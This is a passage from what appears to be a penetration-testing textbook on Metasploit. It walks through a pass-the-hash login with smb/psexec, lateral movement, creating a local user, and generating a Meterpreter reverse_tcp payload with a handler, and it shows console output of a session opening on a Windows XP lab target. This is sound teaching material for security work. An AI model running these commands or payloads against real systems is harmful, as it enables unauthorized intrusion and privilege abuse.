Meterpreter
85
[*] Uploading payload...
[*] Created \JsOvAFLy.exe...
After we select the
smb/psexec
module at and set the options for
LHOST
,
LPORT
, and
RHOST
, we set the
SMBPass
variable, and at we input the hash that
we dumped earlier. As you can see, authentication is successful and we gain
our Meterpreter session. We didn’t have to crack a password, and no pass-
word was needed. We’ve secured
Administrator
privileges using the password
hash alone.
When we successfully compromise one system on a large network, in
most cases that system will have the same administrator account on multiple
systems. This attack would allow us to hop from one system to another with-
out ever needing to crack the password itself.
Privilege Escalation
Now that we have access to the system, we can create a normal user account
with limited permissions using the
net user
command. We’ll create a new
user account to demonstrate how to elevate permissions as that user. (You
will learn more about this in Chapter 8.)
When we compromise a limited user account, we will run into restric-
tions that prevent us from executing commands that require administrative-
level permissions. By elevating an account’s permissions, we overcome that
restriction.
On a Windows XP target machine, we enter the following command:
C:\Documents and Settings\Administrator>
net user bob password123 /add.
Next, we create a Meterpreter-based payload,
payload.exe
, copy it to the
target’s XP machine, and run it under the user account
bob
. This will be our
new limited user account. In this example, we will use
msfpayload
to create a
Meterpreter-based payload as a normal Windows executable. (We’ll discuss
msfpayload
in more detail in Chapter 7.)
root@bt:/opt/framework3/msf3#
msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.33.129 LPORT=443 X > payload.exe
root@bt:/opt/framework3/msf3#
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.33.129 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1056)
meterpreter >
getuid
Server username: IHAZSECURITY\bob